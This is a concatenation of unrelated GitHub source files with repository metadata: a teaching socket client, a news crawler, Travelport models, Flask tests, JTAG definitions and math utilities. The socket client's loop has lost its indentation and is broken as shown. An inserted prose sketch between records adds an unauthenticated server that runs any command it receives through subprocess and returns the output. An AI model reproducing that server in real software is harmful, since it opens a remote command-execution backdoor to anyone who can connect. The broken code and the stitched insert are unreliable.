refs/heads/master
| 2021-01-01T18:36:08.868861 | 2019-01-18T10:39:08 | 2019-01-18T10:39:08 | 98,375,528 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,041 |
py
|
#!/usr/bin/env python
"""
socket client for ssh
"""
import socket
client = socket.socket()
client.connect(("localhost",9999))
while True:
    # let the client keep sending commands to the server in a loop
    cmd = input(">>:").strip()
    if len(cmd) == 0:continue
    client.send(cmd.encode()) # in Python 3 the string must be converted to bytes (utf-8 here) before sending
    cmd_res_size = client.recv(1024)
    print("command result size:",cmd_res_size)
    client.send("please input somthing in order to packet splicing".encode()) # this extra round trip avoids sticky-packet errors when the code runs on Linux
    received_size = 0
    received_data = b''
    while received_size != int(cmd_res_size.decode()): # cmd_res_size is bytes and must be decoded to a string first
data = client.recv(1024)
received_size += len(data)
received_data += data
else:
print("cmd res receive done...",received_size)
print(received_data.decode())
client.close()
|
[
"[email protected]"
] | |
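The client above expects the server to (1) send the result size, (2) wait for the throwaway ack message, then (3) stream the data. A hedged sketch of a matching server loop (my assumption of the counterpart, running commands via subprocess):
import socket
import subprocess
server = socket.socket()
server.bind(("localhost", 9999))
server.listen(5)
conn, addr = server.accept()
while True:
    cmd = conn.recv(1024)
    if not cmd:                                     # client closed the connection
        break
    result = subprocess.getoutput(cmd.decode()).encode()
    conn.send(str(len(result)).encode())            # 1. send result size
    conn.recv(1024)                                 # 2. absorb the client's ack
    conn.sendall(result)                            # 3. stream the command output
conn.close()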
5c2482df35a2b3e2793446e744596a4eff53075d
|
920ab19b73a7cba21d340a49d9d24e2d1eeabf3d
|
/idpsreact/bin/automat-visualize
|
518eafa6739f15f864b7d8624057a1b909d8f1e5
|
[
"MIT"
] |
permissive
|
DTrafford/IDPS
|
5fa2b73f2c47cbf50b90a1a786c10f7d69c995b4
|
1eaccfc218adcb7231e64271731c765f8362b891
|
refs/heads/master
| 2022-12-16T16:28:34.801962 | 2020-03-30T18:08:09 | 2020-03-30T18:08:09 | 234,163,829 | 0 | 0 |
MIT
| 2020-09-10T06:26:02 | 2020-01-15T20:10:09 |
Python
|
UTF-8
|
Python
| false | false | 281 |
#!/Users/sangit/Downloads/django-react-boilerplate-master/idpsreact/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from automat._visualize import tool
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(tool())
|
[
"[email protected]"
] | ||
6684ca9dd67bacb41767bd65a1c0c1f2dd8193ce
|
e07f6ac5559d09eb6f5393650af135c7474f5003
|
/recent_news.py
|
e27c23ffb42fa9cdf553ea3b1d714c6870d9ef68
|
[] |
no_license
|
Money-fin/backend
|
21e188f3f59ccaa216d1ea4bb7b78f670831cb6f
|
909961dc33df84ba3663e622bfdf6ab98f915f5f
|
refs/heads/master
| 2022-12-04T08:32:10.094335 | 2020-08-29T09:57:28 | 2020-08-29T09:57:28 | 291,008,543 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,527 |
py
|
import requests
import sys
sys.path.append("/home/jylee/backend")
import urllib
import os
import time
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
from helper import KafkaHelper
def new_crawl(link, kafka=False):
url = link
item_info = requests.get(url).text
soup = BeautifulSoup(item_info, 'html.parser')
title = soup.select('div.content03 header.title-article01 h1')[0].get_text()
time = soup.select('div.content03 header.title-article01 p')[0].get_text()[4:]
img_url = f"https:{soup.select('div.img-con span img')[0]['src']}"
raw_content = soup.select('div.story-news.article')
# print(raw_content)
content_p = [item.select("p") for item in raw_content]
content_text = [item.get_text().strip() for item in content_p[0]]
content = "\n".join(content_text[1:])
data_dict = {
"title": title,
"content": content,
"link": link
}
if kafka:
KafkaHelper.pub_ninput(data_dict)
else:
data_dict["time"] = time
data_dict["img_url"] = img_url
return data_dict
def recent_new_check():
past_list = ""
while True:
url = f'https://www.yna.co.kr/news?site=navi_latest_depth01'
item_info = requests.get(url).text
soup = BeautifulSoup(item_info, 'html.parser')
new_a_tag = soup.select('div.list-type038 ul')[0].select("li")[0].select("div div a.tit-wrap")
current_link = f"https:{new_a_tag[0]['href']}"
        if past_list == current_link:
            time.sleep(1)  # hypothetical poll interval; avoids busy-waiting on the site
            continue
new_crawl(current_link, True)
past_list = current_link
recent_new_check()
|
[
"[email protected]"
] | |
d309ba906885b2264436cea4fe7c0b1cb6487058
|
9edaf93c833ba90ae9a903aa3c44c407a7e55198
|
/travelport/models/special_equipment_1.py
|
d0b34a9eefba484eaeb14ea03e11c478e502ee89
|
[] |
no_license
|
tefra/xsdata-samples
|
c50aab4828b8c7c4448dbdab9c67d1ebc519e292
|
ef027fe02e6a075d8ed676c86a80e9647d944571
|
refs/heads/main
| 2023-08-14T10:31:12.152696 | 2023-07-25T18:01:22 | 2023-07-25T18:01:22 | 222,543,692 | 6 | 1 | null | 2023-06-25T07:21:04 | 2019-11-18T21:00:37 |
Python
|
UTF-8
|
Python
| false | false | 1,577 |
py
|
from __future__ import annotations
from dataclasses import dataclass, field
from travelport.models.type_element_status_1 import TypeElementStatus1
__NAMESPACE__ = "http://www.travelport.com/schema/common_v52_0"
@dataclass
class SpecialEquipment1:
"""
Parameters
----------
key
type_value
Special equipment associated with a specific vehicle
el_stat
This attribute is used to show the action results of an element.
Possible values are "A" (when elements have been added to the UR)
and "M" (when existing elements have been modified). Response only.
key_override
If a duplicate key is found where we are adding elements in some
cases like URAdd, then instead of erroring out set this attribute to
true.
"""
class Meta:
name = "SpecialEquipment"
namespace = "http://www.travelport.com/schema/common_v52_0"
key: None | str = field(
default=None,
metadata={
"name": "Key",
"type": "Attribute",
}
)
type_value: None | str = field(
default=None,
metadata={
"name": "Type",
"type": "Attribute",
"required": True,
}
)
el_stat: None | TypeElementStatus1 = field(
default=None,
metadata={
"name": "ElStat",
"type": "Attribute",
}
)
key_override: None | bool = field(
default=None,
metadata={
"name": "KeyOverride",
"type": "Attribute",
}
)
|
[
"[email protected]"
] | |
e8611029177ec93e595d82b86b795cbc307b7108
|
d4ab63e2ff846ff509ab3b8a191381bdf8197325
|
/project/test_main.py
|
8544ed907817ff34f90b366519a3db4337d52c5e
|
[] |
no_license
|
ibrobabs/task
|
c2c95d8c83340a38be0ff8a1d7d3da55de33a097
|
82adc4fa54ab9c3606b2770325454916c7f75693
|
refs/heads/master
| 2021-01-18T17:45:31.392805 | 2017-04-01T05:22:24 | 2017-04-01T05:22:24 | 86,812,161 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,298 |
py
|
import os
import unittest
from project import app, db
from project.config import basedir
from project.models import User
TEST_DB = 'test.db'
class MainTests(unittest.TestCase):
#Setup and Teardown
def setUp(self):
app.config['TESTING'] = True
app.config['WTF_CSRF_ENABLED'] = False
# app.config['DEBUG'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(basedir, TEST_DB)
self.app = app.test_client()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
# helper methods
def login(self, name, password):
return self.app.post('/', data=dict(
name=name, password=password), follow_redirects=True)
# tests
def test_404_error(self):
response = self.app.get('/this-route-does-not-exist/')
        self.assertEqual(response.status_code, 404)
self.assertIn(b"Sorry. There's nothing here.", response.data)
def test_500_error(self):
bad_user = User(
name='Jeremy',
email='[email protected]',
password='django'
)
db.session.add(bad_user)
db.session.commit()
self.assertRaises(ValueError, self.login, 'Jeremy', 'django')
try:
response = self.login('Jeremy', 'django')
            self.assertEqual(response.status_code, 500)
except ValueError:
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
37e7b65b2eb87e028e91d5e800045af24ea8b6c0
|
b0a217700c563c4f057f2aebbde8faba4b1b26d2
|
/software/glasgow/arch/jtag.py
|
7c4fe835ca1a2bd2417ce6ed37892e998c03caf9
|
[
"0BSD",
"Apache-2.0"
] |
permissive
|
kbeckmann/Glasgow
|
5d183865da4fb499099d4c17e878a76192b691e7
|
cd31e293cb99ee10a3e4a03ff26f6f124e512c64
|
refs/heads/master
| 2021-09-15T15:59:38.211633 | 2018-11-15T22:36:04 | 2018-11-22T21:13:59 | 157,077,707 | 3 | 0 |
NOASSERTION
| 2018-11-11T12:33:49 | 2018-11-11T12:33:48 | null |
UTF-8
|
Python
| false | false | 250 |
py
|
# Ref: IEEE 1149.1
from bitarray import bitarray
from ..support.bits import *
__all__ = [
# DR
"DR_IDCODE",
]
DR_IDCODE = Bitfield("DR_IDCODE", 4, [
("present", 1),
("mfg_id", 11),
("part_id", 16),
("version", 4),
])
|
[
"[email protected]"
] | |
97450e3407268358d4f64aefe3120b8487b3401e
|
425db5a849281d333e68c26a26678e7c8ce11b66
|
/maths/fast_pow_and_matrix_multi.py
|
987f29bb269b191cf1b8759d9bc80770e1b3e800
|
[
"MIT"
] |
permissive
|
lih627/python-algorithm-templates
|
e8092b327a02506086414df41bbfb2af5d6b06dc
|
a61fd583e33a769b44ab758990625d3381793768
|
refs/heads/master
| 2021-07-23T17:10:43.814639 | 2021-01-21T17:14:55 | 2021-01-21T17:14:55 | 238,456,498 | 29 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,500 |
py
|
import random
def fpowx(x, n):
"""
quick pow: x ** n
"""
res = 1
while n:
if n & 1:
res = res * x
# compute x^2 x^4 x^8
x *= x
n >>= 1
return res
def fmulti(m, n, mod=10 ** 9 + 7):
"""
    Multiplies m by n under a modulus by repeated doubling.
    This gives no speed-up in Python; it only matters for
    other languages such as C, where it prevents integer overflow.
"""
res = 0
while n:
if n & 1:
res += m
m = (m + m) % mod
res %= mod
n >>= 1
return res
def matrix_multiply(matrix_a, matrix_b):
    # multiplication/addition modulo MOD
MOD = 10 ** 9 + 7
n_row = len(matrix_a)
n_col = len(matrix_b[0])
n_tmp = len(matrix_a[0])
matrix_c = [[0 for _ in range(n_col)] for _ in range(n_row)]
for i in range(n_row):
for j in range(n_col):
for k in range(n_tmp):
matrix_c[i][j] += matrix_a[i][k] * matrix_b[k][j] % MOD
matrix_c[i][j] %= MOD
return matrix_c
def get_unit_matrix(n):
# matrix I
unit_matrix = [[0 for _ in range(n)] for _ in range(n)]
for _ in range(n):
unit_matrix[_][_] = 1
return unit_matrix
def quick_matrix_pow(matrix_a, n):
# A ^ n
l = len(matrix_a)
res = get_unit_matrix(l)
while n:
if n & 1:
res = matrix_multiply(res, matrix_a)
        matrix_a = matrix_multiply(matrix_a, matrix_a)
n >>= 1
return res
def test_fmulti():
m = random.randint(10 ** 9, 10 ** 15)
n = random.randint(10 ** 9, 10 ** 15)
res = fmulti(m, n)
return res
def multi(m, n, mod=10 ** 9 + 7):
return m * n % mod
def test_multi():
m = random.randint(10 ** 9, 10 ** 15)
n = random.randint(10 ** 9, 10 ** 15)
res = multi(m, n)
return res
if __name__ == '__main__':
print('fast pow: 2 ** 11: {}'.format(fpowx(2, 11)))
print(fmulti(987654, 987654321))
print(987654 * 987654321 % (10 ** 9 + 7))
# test the speed of fast(?)-multi
import timeit
T_fmulti = timeit.Timer('test_fmulti()',
'from __main__ import test_fmulti')
print('f_multi: {:.6f}s'.format(T_fmulti.timeit(number=1000)))
T_multi = timeit.Timer('test_multi()',
'from __main__ import test_multi')
print('s_multi: {:.6f}s'.format(T_multi.timeit(number=1000)))
# test matrix multiply
a = [[1, 2, 3], [4, 5, 6]]
b = [[1, 2], [3, 4], [5, 6]]
c = matrix_multiply(a, b)
print("a = {}\nb = {}\nc = {}".format(a, b, c))
|
[
"[email protected]"
] | |
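A classic use of quick_matrix_pow above is O(log n) Fibonacci via powers of [[1, 1], [1, 0]] (results are modulo 10**9 + 7, which leaves small values untouched); a short sketch:
def fib(n):
    # [[1, 1], [1, 0]] ** n == [[F(n+1), F(n)], [F(n), F(n-1)]]
    return quick_matrix_pow([[1, 1], [1, 0]], n)[0][1]
assert [fib(i) for i in range(8)] == [0, 1, 1, 2, 3, 5, 8, 13]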
f4506a41f21652bd250f6896810cd6fbdec72bfb
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03042/s013075072.py
|
044f87c3be49952ef7be8bf867e28108c9b4cd05
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 186 |
py
|
s=int(input())
a=s//100
b=s%100
if a>0 and a<=12:
if b>0 and b<=12:
print("AMBIGUOUS")
else:
print("MMYY")
else:
if b>0 and b<=12:
print("YYMM")
else:
print("NA")
|
[
"[email protected]"
] | |
62b6273166486acf1ece5437a98e41a0350b1124
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_celebrating.py
|
305a78d8f0d008577d0f029e5a82a8910f663133
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 261 |
py
|
from xai.brain.wordbase.verbs._celebrate import _CELEBRATE
# class header
class _CELEBRATING(_CELEBRATE, ):
def __init__(self,):
_CELEBRATE.__init__(self)
self.name = "CELEBRATING"
self.specie = 'verbs'
self.basic = "celebrate"
self.jsondata = {}
|
[
"[email protected]"
] | |
2f0cb96aaa337f7309712bd930d65de11673c433
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Pytest/pytest-django/pytest_django/plugin.py
|
cbfe15f79cb04f0e152ebe02bc8b4d3886108f5f
|
[
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null |
UTF-8
|
Python
| false | false | 130 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:4b9c174912c01ae59fb496601d8c4ecf26765ee33134d079295304c25873875a
size 26008
|
[
"[email protected]"
] | |
1731a6bc44fffbafb6437d4bb39a9bb76acfeb29
|
45c170fb0673deece06f3055979ece25c3210380
|
/toontown/coghq/BossbotCountryClubMazeRoom_Battle00.py
|
218b80966c9553066709cc1c2f781554cc97b785
|
[] |
no_license
|
MTTPAM/PublicRelease
|
5a479f5f696cfe9f2d9dcd96f378b5ce160ec93f
|
825f562d5021c65d40115d64523bb850feff6a98
|
refs/heads/master
| 2021-07-24T09:48:32.607518 | 2018-11-13T03:17:53 | 2018-11-13T03:17:53 | 119,129,731 | 2 | 6 | null | 2018-11-07T22:10:10 | 2018-01-27T03:43:39 |
Python
|
UTF-8
|
Python
| false | false | 2,389 |
py
|
#Embedded file name: toontown.coghq.BossbotCountryClubMazeRoom_Battle00
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_12/models/bossbotHQ/BossbotMazex1_C',
'wantDoors': 1},
1001: {'type': 'editMgr',
'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
110000: {'type': 'battleBlocker',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-131.21, 84.92, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1),
'cellId': 0,
'radius': 10},
110202: {'type': 'door',
'name': '<unnamed>',
'comment': '',
'parentEntId': 110001,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'color': Vec4(1, 1, 1, 1),
'isLock0Unlocked': 1,
'isLock1Unlocked': 0,
'isLock2Unlocked': 1,
'isLock3Unlocked': 1,
'isOpen': 0,
'isOpenEvent': 0,
'isVisBlocker': 0,
'secondsOpen': 1,
'unlock0Event': 0,
'unlock1Event': 110000,
'unlock2Event': 0,
'unlock3Event': 0},
110002: {'type': 'maze',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-141.563, -78.8353, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'numSections': 1},
10002: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
110001: {'type': 'nodepath',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-106.91, 82.6953, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1)}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
|
[
"[email protected]"
] | |
c5020aa411c33ba9eb808cd247fe814f9c0ece17
|
8f5f92beeaefcd9effc93da87b26acb5ea159274
|
/xtorch/modules/seq2seq_encoders/seq2seq_encoder.py
|
edcdada140696dba36c224bbb20440c20a1c8b5f
|
[
"MIT"
] |
permissive
|
altescy/xtorch
|
15f984bf08654dc00fc1be603cca696676428cc1
|
bcbbbe645f4d62c211af5b3555c526cc60792c32
|
refs/heads/main
| 2023-04-12T15:45:52.192602 | 2021-04-25T11:35:45 | 2021-04-25T11:35:45 | 361,373,990 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 805 |
py
|
from typing import Optional
import torch
class Seq2seqEncoder(torch.nn.Module):
def forward(
self,
inputs: torch.Tensor,
mask: Optional[torch.BoolTensor] = None,
) -> torch.Tensor:
"""
Parameters
==========
inputs: `torch.Tensor`
Tensor of shape (batch_size, sequence_length, embedding_size).
mask: `torch.BoolTensor`, optional (default = None)
BoolTensor of shape (batch_size, sequence_length).
Return
======
output:
Tensor of shape (batch_size, sequence_length, encoding_size).
"""
raise NotImplementedError
def get_input_dim(self) -> int:
raise NotImplementedError
def get_output_dim(self) -> int:
raise NotImplementedError
|
[
"[email protected]"
] | |
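A concrete subclass only needs forward plus the two dimension getters; an illustrative BiLSTM implementation (my sketch, not part of the library; the post-hoc masking is deliberately simplistic):
import torch
class LstmSeq2seqEncoder(Seq2seqEncoder):
    def __init__(self, input_dim: int, hidden_dim: int) -> None:
        super().__init__()
        self._input_dim = input_dim
        self._output_dim = 2 * hidden_dim          # bidirectional doubles the size
        self._lstm = torch.nn.LSTM(
            input_dim, hidden_dim, batch_first=True, bidirectional=True
        )
    def forward(self, inputs, mask=None):
        output, _ = self._lstm(inputs)
        if mask is not None:
            output = output * mask.unsqueeze(-1)   # zero out padded positions
        return output
    def get_input_dim(self) -> int:
        return self._input_dim
    def get_output_dim(self) -> int:
        return self._output_dim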
e32d9ecd5addc70ef1833cfb869c834a230a4f2c
|
7f97814acd76ca96aee877fd70d401380f848fae
|
/7_training/re_start_end.py
|
e5842c00b391813441ccd2346854697e29805bbb
|
[] |
no_license
|
tberhanu/all_trainings
|
80cc4948868928af3da16cc3c5b8a9ab18377d08
|
e4e83d7c71a72e64c6e55096a609cec9091b78fa
|
refs/heads/master
| 2020-04-13T12:12:21.272316 | 2019-03-16T04:22:20 | 2019-03-16T04:22:20 | 163,195,802 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 485 |
py
|
"""
https://www.hackerrank.com/challenges/re-start-re-end/problem?h_r=next-challenge&h_v=zen
"""
# Enter your code here. Read input from STDIN. Print output to STDOUT
import re
s, k = input(), input()
i = 0
found = False
while i < len(s):
string = s[i:]
match = re.match(r'{}'.format(k), string)
if match == None:
i = i + 1
else:
found = True
print((match.start() + i, match.end() + i - 1))
i = i + 1
if not found:
    print((-1, -1))
|
[
"[email protected]"
] | |
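The manual index-advancing loop above exists because re.finditer skips overlapping matches; wrapping the pattern in a lookahead gives the same overlapping behaviour in one pass (alternative sketch):
import re
s, k = "aaadaa", "aa"
matches = [(m.start(1), m.end(1) - 1)
           for m in re.finditer(r'(?=({}))'.format(k), s)]
print(matches or [(-1, -1)])   # [(0, 1), (1, 2), (4, 5)]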
edcbbc430b0d1a558d19be8a4a2625b7c762eb20
|
5add80be09ee754fced03e512a9acc214971cddf
|
/python-code/openvx-learning/helloworld.py
|
61352b55542a81f5e56cc66c6767ea1beb6c1d65
|
[
"Apache-2.0"
] |
permissive
|
juxiangwu/image-processing
|
f774a9164de9c57e88742e6185ac3b28320eae69
|
c644ef3386973b2b983c6b6b08f15dc8d52cd39f
|
refs/heads/master
| 2021-06-24T15:13:08.900960 | 2019-04-03T10:28:44 | 2019-04-03T10:28:44 | 134,564,878 | 15 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 935 |
py
|
from pyvx import vx
context = vx.CreateContext()
images = [
vx.CreateImage(context, 640, 480, vx.DF_IMAGE_UYVY),
vx.CreateImage(context, 640, 480, vx.DF_IMAGE_S16),
vx.CreateImage(context, 640, 480, vx.DF_IMAGE_U8),
]
graph = vx.CreateGraph(context)
virts = [
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
]
vx.ChannelExtractNode(graph, images[0], vx.CHANNEL_Y, virts[0])
vx.Gaussian3x3Node(graph, virts[0], virts[1])
vx.Sobel3x3Node(graph, virts[1], virts[2], virts[3])
vx.MagnitudeNode(graph, virts[2], virts[3], images[1])
vx.PhaseNode(graph, virts[2], virts[3], images[2])
status = vx.VerifyGraph(graph)
if status == vx.SUCCESS:
status = vx.ProcessGraph(graph)
else:
print("Verification failed.")
vx.ReleaseContext(context)
|
[
"[email protected]"
] | |
d92df5cd630581d42b06e50bdc1070c5d414a17c
|
9647524c0f4d93fb1c8a992c20fe9f9d2710cde3
|
/2-content/Python/intro_programming-master/scripts/remove_input_references.py
|
2ab8878b1a362f079adf49a971ef71aa7677a4ea
|
[
"MIT"
] |
permissive
|
bgoonz/web-dev-notes-resource-site
|
16161aa68e8eecafeaba4dc7abeb957aaee864c5
|
e7dc9c30393597cb39830c49c3f51c1486b97584
|
refs/heads/master
| 2023-09-01T14:04:20.867818 | 2021-06-17T07:56:20 | 2021-06-17T07:56:20 | 329,194,347 | 7 | 5 |
MIT
| 2021-07-05T06:36:49 | 2021-01-13T04:34:20 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,306 |
py
|
# This script removes the input reference numbers from html pages.
# They play a useful role in scientific notebooks, but they are really
# just visual clutter in this project.
# Could be an nbconvert setting, but it's an easy enough scripting job.
import os
import sys
print("\nStripping input reference numbers from code cells...")
# Find all files to work with.
path_to_notebooks = '/srv/projects/intro_programming/intro_programming/notebooks/'
filenames = []
for filename in os.listdir(path_to_notebooks):
if '.html' in filename and filename != 'index.html':
filenames.append(filename)
# one file for testing:
#filenames = ['hello_world.html']
for filename in filenames:
f = open(path_to_notebooks + filename, 'r')
lines = f.readlines()
f.close()
f = open(path_to_notebooks + filename, 'wb')
for line in lines:
# Unwanted lines have opening and closing div on same line,
# with input reference number between them.
if ('<div class="prompt input_prompt">' in line
and '</div>' in line):
# Don't write this line.
continue
else:
# Regular line, write it.
f.write(line.encode('utf-8'))
f.close()
print(" Stripped input reference numbers.\n")
|
[
"[email protected]"
] | |
dd55eae4011f0cb80d47c940385e7a3ff85cd7a3
|
602fa0e4ce194d3073d78230c61f7053281f9f9b
|
/code/python/src/categories/catutil.py
|
df03a0027b66f8d76d4265de7c7074d56b487bab
|
[] |
no_license
|
ziqizhang/wop
|
111cfdda1686a874ff1fc11a453a23fb52d43af1
|
ea0c37f444de9f2d5303f74b989f6d1a09feb61d
|
refs/heads/master
| 2022-09-14T20:14:11.575021 | 2021-12-10T21:23:24 | 2021-12-10T21:23:24 | 166,239,995 | 2 | 1 | null | 2022-09-01T23:11:13 | 2019-01-17T14:33:51 |
Python
|
UTF-8
|
Python
| false | false | 2,128 |
py
|
import pandas as pd
from nltk import PorterStemmer, WordNetLemmatizer
import numpy
from categories import cleanCategories as cc
stemmer = PorterStemmer()
lemmatizer = WordNetLemmatizer()
#0=stem; 1=lem; else=nothing
def normalise_categories(in_file_name, col, stem_or_lem):
df = pd.read_csv(in_file_name, header=0, delimiter=";", quoting=0, encoding="utf-8",
                     ).values
norm_cats=set()
max_toks=0
for r in df:
c = r[col]
if type(c) is not str and numpy.isnan(c):
c="NONE"
toks = len(c.split(" "))
if toks>max_toks:
max_toks=toks
if stem_or_lem==0:
c=stemmer.stem(c).strip()
if len(c)>2:
norm_cats.add(c)
elif stem_or_lem==1:
c=lemmatizer.lemmatize(c).strip()
if len(c)>2:
norm_cats.add(c)
else:
norm_cats.add(c)
norm_cats_list=list(norm_cats)
norm_cats_list=sorted(norm_cats_list)
print(len(norm_cats_list))
print(max_toks)
for nc in norm_cats_list:
print(nc)
def get_parent_category_level(in_file_name, col):
df = pd.read_csv(in_file_name, header=0, delimiter=";", quoting=0, encoding="utf-8",
                     ).values
norm_cats = set()
norm_cats_list=[]
for r in df:
c = r[col]
if type(c) is not str and numpy.isnan(c):
continue
c= cc.normaliseCategories(c)
try:
trim = c.index(">")
except ValueError:
continue
c=c[0:trim].strip()
norm_cats.add(c)
norm_cats_list.append(c)
norm_cats_unique_list=sorted(list(norm_cats))
norm_cats=sorted(norm_cats)
for nc in norm_cats:
print(nc)
print("\n\n>>>>>>>>>\n\n")
for nc in norm_cats_unique_list:
print(nc)
if __name__ == "__main__":
# normalise_categories("/home/zz/Work/data/wop_data/goldstandard_eng_v1_cleanedCategories.csv",
# 13,0)
get_parent_category_level("/home/zz/Work/data/wop_data/goldstandard_eng_v1_utf8.csv",
8)
|
[
"[email protected]"
] | |
d384f24b5c0b0b257f66b1db1a63854c59b95395
|
3e4c69317323bca865b025503b60bf83d3ae65f8
|
/tests/server/blueprints/variants/test_variant_views_variant.py
|
c1fd7fe078f8967099df90b24cb215c5a79a60ac
|
[
"BSD-3-Clause"
] |
permissive
|
tapaswenipathak/scout
|
f59beaa997a45487ac96c3b3e560b5e5aa9b30ae
|
c9b3ec14f5105abe6066337110145a263320b4c5
|
refs/heads/master
| 2020-05-30T11:13:25.662300 | 2019-05-28T09:26:25 | 2019-05-28T09:26:25 | 189,694,812 | 1 | 0 |
BSD-3-Clause
| 2019-06-01T05:36:35 | 2019-06-01T05:36:34 | null |
UTF-8
|
Python
| false | false | 1,207 |
py
|
# -*- coding: utf-8 -*-
import logging
from flask import url_for
log = logging.getLogger(__name__)
def test_server_variant(app, real_adapter):
# GIVEN an initialized app
# GIVEN a valid user, institute, case and variant
adapter = real_adapter
variant_obj = adapter.variant_collection.find_one()
assert variant_obj
with app.test_client() as client:
# GIVEN that the user could be logged in
resp = client.get(url_for('auto_login'))
assert resp.status_code == 200
internal_case_id = variant_obj['case_id']
case = adapter.case(internal_case_id)
case_name = case['display_name']
owner = case['owner']
# NOTE needs the actual document_id, not the variant_id
variant_id = variant_obj['_id']
log.debug('Inst {} case {} variant {}'.format(owner,case_name,
variant_id))
# WHEN accessing the variant page
resp = client.get(url_for('variants.variant',
institute_id=owner,
case_name=case_name,
variant_id=variant_id))
log.debug("{}",resp.data)
# THEN it should return a page
assert resp.status_code == 200
|
[
"[email protected]"
] | |
d0a3f8fea955cd6b7239c30eb4bde72572683e27
|
f2f88a578165a764d2ebb4a022d19e2ea4cc9946
|
/pyvisdk/do/guest_authentication.py
|
f16ac39d82372db0665b605fca27476d5d281d82
|
[
"MIT"
] |
permissive
|
pombredanne/pyvisdk
|
1ecc68a1bf264095f72f274c776e5868fb302673
|
de24eb4426eb76233dc2e57640d3274ffd304eb3
|
refs/heads/master
| 2021-01-21T16:18:39.233611 | 2014-07-28T19:50:38 | 2014-07-28T19:50:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,039 |
py
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def GuestAuthentication(vim, *args, **kwargs):
'''GuestAuthentication is an abstract base class for authentication in the guest.'''
obj = vim.client.factory.create('ns0:GuestAuthentication')
# do some validation checking...
if (len(args) + len(kwargs)) < 1:
        raise IndexError('Expected at least 1 argument got: %d' % len(args))
required = [ 'interactiveSession' ]
optional = [ 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
|
[
"[email protected]"
] | |
dd42b52d712e69767f647a33a975f897d68b913f
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/OssDirectoryDetail.py
|
7b7aed746981c86b4885e7159246c6f7d6a7017c
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
